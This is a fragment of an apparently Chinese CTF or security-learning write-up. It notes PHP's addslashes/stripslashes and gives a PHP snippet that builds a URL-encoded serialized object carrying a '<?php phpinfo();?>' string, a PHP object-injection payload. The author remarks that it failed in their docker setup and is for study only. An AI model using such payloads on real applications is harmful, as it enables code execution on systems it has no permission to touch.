addslashes() 转义
stripslashes() 删除转义
123456789101112
<?phpclass a{ var $test; public function __construct() { $this->test = '<?php phpinfo();?>'; }}echo urlencode(serialize(new a()));
但是,由于源码的hello.php使用的路径与搭建环境时使用docker环境不同,导致该地址无法访问到该文件,学习知识就好
hello.php
docker